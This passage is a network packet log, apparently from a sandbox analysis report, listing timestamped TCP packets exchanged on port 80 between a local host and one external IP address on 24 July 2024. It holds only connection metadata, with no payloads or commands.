Jul 24, 2024 19:56:24.777228117 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.777729034 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.777740955 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.778004885 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.778341055 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.778354883 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.778363943 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.778397083 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.778444052 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.853173971 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.853210926 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.853225946 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.853375912 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.853869915 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.853883982 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.854049921 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.856518030 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.856532097 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.856544018 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.856555939 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.856568098 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.856580973 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.856604099 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.856714964 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.856813908 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.856829882 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.856933117 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.857927084 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.857940912 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.857953072 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.858258963 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.858258963 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.858617067 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.858629942 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.858674049 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.859183073 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.859196901 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.859301090 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.859891891 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.859913111 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.859954119 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.860683918 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.860698938 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.860708952 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.860773087 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.860821009 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.860938072 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.861521959 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.861536026 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.861546993 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.861623049 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.862298012 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.862313986 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.862324953 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.862416029 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.862467051 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.863264084 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.863395929 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.863409042 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.863420963 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.863473892 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.863639116 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.942271948 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.942394018 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.942409039 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.942562103 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.943007946 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.943022013 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.943036079 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.943151951 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.943919897 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.943933964 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.943947077 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.944179058 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.944863081 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.944876909 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.944888115 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.944900990 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.944993973 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.945854902 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.945867062 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.945878983 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.945957899 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.946718931 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.946731091 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.946744919 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.947216034 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.947668076 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.947686911 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.947699070 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.947819948 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.947819948 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.948656082 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.948668957 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.948679924 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.948694944 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.948817968 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.949342012 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.949641943 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.949686050 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.949704885 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.950015068 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.951733112 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.951752901 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.951764107 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.951776028 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.951787949 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.951800108 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.951809883 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.951957941 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.951957941 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.952023983 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.952037096 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.952048063 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.952090025 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.952831030 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.952846050 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.952858925 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.953005075 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.953005075 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.954660892 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.954679966 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.954691887 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.954704046 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.954799891 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.954878092 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.955480099 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.955496073 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.955507040 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.955518961 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.955530882 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.955542088 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.955574989 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.955703974 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.955950975 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.955965996 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.955977917 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.955988884 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.956130981 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.956130981 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:24.956851006 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.956868887 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:24.956967115 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.032108068 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.032243967 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.032257080 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.032296896 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.032717943 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.032731056 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.032743931 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.032999039 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.032999992 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.033512115 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.033529043 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.033543110 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.033607006 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.034279108 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.034292936 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.034305096 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.034318924 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.034351110 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.034351110 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.035198927 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.035216093 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.035227060 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.035249949 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.035285950 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.035892963 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.035907030 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.035918951 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.036014080 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.036699057 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.036714077 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.036725998 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.036739111 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.036782026 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.036782026 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.037472010 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.037487030 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.037497997 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.037544012 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.037544012 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.038266897 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.038279057 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.038290977 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.038369894 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.039067984 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.039082050 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.039093971 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.039108992 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.039124012 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.039401054 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.039716959 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.039730072 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.039742947 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.039755106 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.039762020 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.039839029 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.040584087 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.040597916 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.040610075 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.040623903 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.040636063 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.040695906 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.041476011 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.041488886 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.041501045 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.041516066 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.041528940 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.041570902 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.041572094 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.041572094 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.042268991 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.042283058 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.042296886 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.042311907 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.042334080 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.042371988 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.043215990 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.043230057 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.043241978 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.043255091 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.043267012 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.043272018 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.043312073 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.043975115 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.043989897 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.044008017 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.044020891 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.044142008 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.044142008 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.044814110 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.044827938 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.044842005 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.044853926 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.044866085 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.044930935 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.044930935 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.044930935 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.045680046 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.045694113 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.045706034 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.045720100 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.045768023 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.045768023 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.046528101 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.046542883 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.046554089 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.046566963 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.046578884 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.046607018 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.046767950 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.047339916 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.047354937 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.047365904 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.047379017 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.047561884 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.047561884 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.048163891 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.048177004 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.048188925 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.048201084 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.048213005 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.048224926 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.048237085 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.048237085 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.048301935 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.049138069 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.049151897 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.049165010 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.049179077 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.049190998 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.049210072 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.049210072 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.049329042 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.050087929 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.050102949 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.050113916 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.050127029 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.050138950 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.050151110 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.050199986 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.050199986 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.051014900 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.051028013 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.051040888 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.051054955 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.051067114 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.051088095 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.051152945 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.051851034 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.051948071 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.052035093 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.052048922 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.052068949 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.052081108 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.052092075 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.052104950 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.052130938 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.052130938 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.052203894 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.120265961 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.120780945 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.120794058 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.120806932 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.120819092 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.120831966 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.120831966 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.120848894 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.120871067 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.120871067 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.123632908 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.123646975 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.123658895 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.123667002 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.123678923 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.123689890 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.123704910 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.123718977 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.123745918 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.123745918 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.123806000 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.124154091 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.124166965 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.124178886 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.124191046 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.124203920 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.124269962 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.124269962 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.124269962 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.124754906 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.124769926 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.124780893 CEST	80	49733	64.190.113.113	192.168.2.10
